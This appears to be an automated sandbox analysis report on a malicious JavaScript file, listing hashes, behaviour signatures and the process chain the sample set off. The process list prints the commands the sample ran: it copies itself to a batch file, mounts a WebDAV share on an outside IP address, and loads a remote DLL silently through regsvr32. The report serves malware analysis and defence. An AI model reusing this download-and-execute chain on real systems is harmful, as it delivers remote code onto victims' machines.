Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
10-07-2024 18:10
General
-
Target
1309471532502224382.js
-
Size
5KB
-
MD5
dc3752d227b0ad028a75a1f7a16ba884
-
SHA1
391eae8a097acf7872cb920f0a6828c2d7a5ebbe
-
SHA256
eba79dbc2dfde95b2303a3994bb2a0973474e9b27864f2dcd82852594d015fbc
-
SHA512
3a56e94821240caec3c12b9474fddd9dee5dbc513a5dbe19099916d111fb1aaeecc1554ea493748bf12e9a3bf01d28982c3d5869d1e8cd52d577c4d59000f7ac
-
SSDEEP
96:HycCf5CU7uEYz6xVFEYzdcHTbbMsZ8kFWD781X9AlHi8eBij99b7F08eBUCIJf8i:HqBdez6xTzdGTbbByyWMTAI8eYjfe8eo
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1309471532502224382.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1309471532502224382.js" "C:\Users\Admin\\qvamom.bat" && "C:\Users\Admin\\qvamom.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\712.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5dc3752d227b0ad028a75a1f7a16ba884
SHA1391eae8a097acf7872cb920f0a6828c2d7a5ebbe
SHA256eba79dbc2dfde95b2303a3994bb2a0973474e9b27864f2dcd82852594d015fbc
SHA5123a56e94821240caec3c12b9474fddd9dee5dbc513a5dbe19099916d111fb1aaeecc1554ea493748bf12e9a3bf01d28982c3d5869d1e8cd52d577c4d59000f7ac